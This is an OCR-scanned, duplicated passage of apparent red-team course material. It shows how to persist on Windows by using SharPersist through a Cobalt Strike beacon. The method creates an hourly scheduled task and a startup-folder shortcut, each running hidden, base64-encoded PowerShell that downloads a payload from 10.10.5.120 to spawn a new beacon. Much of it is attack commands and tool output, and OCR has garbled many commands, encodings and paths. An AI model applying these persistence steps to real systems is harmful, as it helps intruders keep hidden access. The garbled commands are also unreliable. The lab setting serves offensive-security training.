Task Scheduler
The Windows Task Scheduler allows us to create "tasks" that execute on a pre-determined trigger. That trigger could be a time of day, on user-logon, when the computer goes idle, when the computer is locked, or
a combination thereof.
Let's create a scheduled task that will execute a PowerShell payload once every hour. To save ourselves from having to deal with lots of quotations in the |EX cradle, we can encode it to base64 and execute it using
the -EncodedCommand parameter in PowerShell (often appreciated to -enc).
This is a little complicated to do, because it must use Unicode encoding (rather than UTF8 or ASCII).
In PowerShell:
PSEECN > SsTE
SQBFAFEATAACACEAbEBIAHCALQBVAGTAagBl1A
AALgATACAAMQAYADAAL wBhACTAKQAD ‘
In Linux:
://10.10.5.120/a"
SQBFAFgAIMnACgAbgBlAHcAquvAGIAagB A
AALgATACAAMQAYADAAL wBhACTAKQADAA=
beacon> execute assembl C:\Tools\SharPersist\SharPersist\bin\Debug\SharPersist.exe -t schtask -c "C: dows \System32\WindowsPowerShell\vl.@\powershell.exe"
-a ‘-nnp -u hidden -enc
smFArmwgstmmmm
Colmand. .\Hmdous\SystelSZ\H
%1 INFO: Command Args: -nop -w hidden -enc
SQBFAFgAIAACACEAbEB1AHCALQBVAGLAagB1AGMA
AALgATAC4AAMQAYADAALWBhACTAKQApAA==
[*] INFO: Scheduled Task Nale'
[‘] INFO: O!Itlon. hour'ly
[+] SUCCESSl' Scheduled task added
Where:
e -t isthe desired persistence technique.
e - is the command to execute.
* -a are any arguments for that command.
® -n isthe name of the task.
e -misto add the task (you can also remove, check and list).
* -0 is the task frequency.
On the console of WKSTN-1, open the Task Scheduler and select Task Scheduler Library in the left-hand menu. You should see your task appear in the main window. You may of course wait for one hour, or
simply highlight the task and click Run in the right-hand Actions menu. This should spawn another Beacon.
COMPLETE
& CONTINUE -
Join us now -> hide0l.ir | donate.hide0l.ir | t.me/Hide0l | t.me/RedBlueHit
, Startup Folder
Applications, files and shortcuts within a user's startup folder are launched automatically when they first log in. It's commonly used to bootstrap the user's home environment (set wallpapers, shortcut's etc).
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Debug\SharPersist.exe
"C:\Windows\System32\WindowsPowerShell\v1.@\powershell.exe™ -a "-nop -w hidden -enc
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBIAfllAdAAgAGdAZQBOACMduBIAfi Ypas QBUAHQAKQAUAGQADY
[*] INFO: Calnand (€8 \umdous\Systenaz\ul dow
[*] INFO: Command Args: -nop -w hidden -en
SQBFAFgAIAACACEAbEB1AHCALQBVAGIAagB
AALgA1AC4AMQAYADAAL WBhACIAKQApDAA
[*] INFO: File Name: UserEnvSetup
[+] SUCCESS: Startup folder persister c ad
[*] INFO: LNK File located at: &.\Users\lrfar-er\ ) ming\Mici
[*] INFO: SHA256 Hash of LNK file: B34647F8D8B7CE28C1FODA3FF444D9B7244C41370B88061472933B2607A169BC
Where:
o -f isthe filename to save as.
Use the WKSTN-1 console to check C:\Users\bfarmer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ forthe file that was dropped. To test it, simply double-click the
link file to run or reboot the VM.
COMPLETE
& CONTINUE =
Join us now -> hide0Ol.ir | donate.hide0Ol.ir | t.me/Hide0l | t.me/RedBlueHit
The Windows Task Scheduler allows us to create "tasks" that execute on a pre-determined trigger. That trigger could be a time of day, on user-logon, when the computer goes idle, when the computer is locked, or
a combination thereof.
Let's create a scheduled task that will execute a PowerShell payload once every hour. To save ourselves from having to deal with lots of quotations in the |EX cradle, we can encode it to base64 and execute it using
the -EncodedCommand parameter in PowerShell (often appreciated to -enc).
This is a little complicated to do, because it must use Unicode encoding (rather than UTF8 or ASCII).
In PowerShell:
PSEECN > SsTE
SQBFAFEATAACACEAbEBIAHCALQBVAGTAagBl1A
AALgATACAAMQAYADAAL wBhACTAKQAD ‘
In Linux:
://10.10.5.120/a"
SQBFAFgAIMnACgAbgBlAHcAquvAGIAagB A
AALgATACAAMQAYADAAL wBhACTAKQADAA=
beacon> execute assembl C:\Tools\SharPersist\SharPersist\bin\Debug\SharPersist.exe -t schtask -c "C: dows \System32\WindowsPowerShell\vl.@\powershell.exe"
-a ‘-nnp -u hidden -enc
smFArmwgstmmmm
Colmand. .\Hmdous\SystelSZ\H
%1 INFO: Command Args: -nop -w hidden -enc
SQBFAFgAIAACACEAbEB1AHCALQBVAGLAagB1AGMA
AALgATAC4AAMQAYADAALWBhACTAKQApAA==
[*] INFO: Scheduled Task Nale'
[‘] INFO: O!Itlon. hour'ly
[+] SUCCESSl' Scheduled task added
Where:
e -t isthe desired persistence technique.
e - is the command to execute.
* -a are any arguments for that command.
® -n isthe name of the task.
e -misto add the task (you can also remove, check and list).
* -0 is the task frequency.
On the console of WKSTN-1, open the Task Scheduler and select Task Scheduler Library in the left-hand menu. You should see your task appear in the main window. You may of course wait for one hour, or
simply highlight the task and click Run in the right-hand Actions menu. This should spawn another Beacon.
COMPLETE
& CONTINUE -
Join us now -> hide0l.ir | donate.hide0l.ir | t.me/Hide0l | t.me/RedBlueHit
, Startup Folder
Applications, files and shortcuts within a user's startup folder are launched automatically when they first log in. It's commonly used to bootstrap the user's home environment (set wallpapers, shortcut's etc).
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Debug\SharPersist.exe
"C:\Windows\System32\WindowsPowerShell\v1.@\powershell.exe™ -a "-nop -w hidden -enc
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBIAfllAdAAgAGdAZQBOACMduBIAfi Ypas QBUAHQAKQAUAGQADY
[*] INFO: Calnand (€8 \umdous\Systenaz\ul dow
[*] INFO: Command Args: -nop -w hidden -en
SQBFAFgAIAACACEAbEB1AHCALQBVAGIAagB
AALgA1AC4AMQAYADAAL WBhACIAKQApDAA
[*] INFO: File Name: UserEnvSetup
[+] SUCCESS: Startup folder persister c ad
[*] INFO: LNK File located at: &.\Users\lrfar-er\ ) ming\Mici
[*] INFO: SHA256 Hash of LNK file: B34647F8D8B7CE28C1FODA3FF444D9B7244C41370B88061472933B2607A169BC
Where:
o -f isthe filename to save as.
Use the WKSTN-1 console to check C:\Users\bfarmer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ forthe file that was dropped. To test it, simply double-click the
link file to run or reboot the VM.
COMPLETE
& CONTINUE =
Join us now -> hide0Ol.ir | donate.hide0Ol.ir | t.me/Hide0l | t.me/RedBlueHit
